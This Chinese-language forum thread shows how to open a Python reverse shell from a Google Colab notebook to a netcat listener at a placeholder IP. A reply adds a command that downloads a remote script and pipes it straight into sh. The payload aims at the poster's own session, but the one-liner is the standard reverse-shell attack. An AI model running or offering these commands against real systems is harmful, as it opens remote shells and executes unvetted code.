colab 使用 python 反弹 shell

今天才看到 colab 这个平台 :rofl:,之前确实没仔细研究这是啥

看到是 Jupyter Notebook, 想到了一个用法, 那就是用 python 是反弹一个 shell

  1. 找个有公网IP 的机器, 执行 `➜ ~ nc -lvvp 2333

  2. 在 colab 执行

`!python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“xxx.xxx.xxx.xxx”,2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’

  1. 公网机器就可以拿到 shell 了
8 个赞

有没有试过百度的 aistuido 可以吗?

:rofl: 这个又是啥 没搜到啊

真会玩啊

搞七捻三网络安全

这也行

宣告失败,百度只能单向访问

看不懂 :exploding_head:

1 个赞

看晕了 牛

看不懂

其实还有个更方便的方法

!curl -sSf https://sshx.io/get | sh
!sshx
3 个赞